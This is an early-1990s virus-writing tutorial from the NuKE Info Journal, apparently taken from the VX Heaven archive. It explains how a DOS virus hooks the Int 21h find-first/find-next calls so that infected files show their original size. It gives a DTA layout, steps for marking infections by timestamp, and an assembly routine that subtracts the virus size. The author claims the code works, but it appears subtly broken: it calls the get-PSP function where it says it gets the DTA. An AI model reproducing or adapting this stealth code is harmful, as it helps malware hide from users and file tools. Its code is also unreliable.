VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Dir Stealth Method 2

Rock Steady
Nuke Info Journal [4]
August 1992

[Back to index] [Comments]

Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton Utilities, or *SOME* File Managing systems like DOS-Shell, the File increase of infected files is know visable. There is no doubt about it, if you only put Method #1 in your virus you will encounter times were the file increase shows. Its not because your Routine isn't good! But due to the fact that there is another way to Read the Dir Listing by DOS. An this method is Call File-find by ASCIIZ format.

We just learned how to edit File-Find by FCB. Which is used by MS-DOS PC-DOS and some other programs. But unlike the others, they use the ASCIIZ file-Find method as it is EASIER to open, close, edite, and any other file access routine is ALOT easier with the ASCIIZ or (File Handle) system. So we will make our Virus Stealth to Method #2! Making us 100% Stealth from file-finds...

The Function we have to Intecept is Interrupt 21h, with Functions AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File) The Way to go about it is Very much ALIKE to the first one, so just understand the thoery, and you'll be able to program it within seconds.

When this function is called, it will fill the current DTA with 12 entries totally 43 bytes. The DTA will be set up as follows: (below) BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T like the FCB, or PSP that is anyways the same! You can play with this as you wish. You also use this DTA to read the Command Line Parameters... etc...

00h 1 Drive Letter
01h 11Seach Template (Eg:????????COM)
0Ch 1 Attribute Search
0Dh 2 Entry count within Directory
0Fh 2 Cluster Number of start of parent directory
11h 4 Reserved (Atleast Undocumented)
15h 1 Attribute of File FOUND
@16h2 File's Time (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year
18h 2 File's Date (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year
*1Ah4 File's Size (Word Reverse Order, Dah!!?!)
1Eh 13ASCIIZ File name & Extension

* = Must be Edited by Virus is File Infected

@ = Needed to Check if File is Infected. (Seconds Field)


CONDISTION: DS:DX points to ASCIIZ of file search. CX: Contains File Attributes

Step 1. Call Dos so it fills the DTA with its findings

Step 2. Test for CF=1 (Carry Flag) as error happened errors happen if File not found, no more files etc...

Step 3. Get Seconds Field And UnMask Seconds

Step 4. Check if seconds = 58 (What ever your using) Quit if NOT Notice we use `XOR AL,1Dh' rather than `CMP AL,1Dh' Check in your ASM Bible, which is Faster? Size? Remember speed & size is EVERYTHING, That is why My lastest are quite small viriis for stealthness!!

Step 5. If Infected Subtract Virus Size from File

Step 6. Quit

 ;This is the routine. once you get AH=4Eh/4Fh in you Int 21h Call this
 ;Routine...  (Look at Method #1 for Int21h handler)
         pushf                        ;Fake an Int Call
         push    cs                   ;Save our location
         call    int21Call            ;Step #1
         jc      no_good              ;Error Split
         push    ax
         push    bx
         push    es
         mov     ah,51h               ;Get Current DTA
         int     21h                  ;ES:BX --> DTA

         mov     ax,es:[bx+16h]       ;Get File Time
         and     ax,1fh               ;Un Mask Seconds field
         xor     al,1dh               ;Is it 58 Seconds?
         jnz     not_infected         ;Not infected! Dah?
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!
         pop     es
         pop     bx                   ;Restore Registers
         pop     ax
 ; This code WORKS and is also 100% (c) Rock Steady / NuKE
                            Rock Steady
         `WaTch OuT WaReZ PuPpiEs NuKE PoX V2.0 WiLl GeTcHa'
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka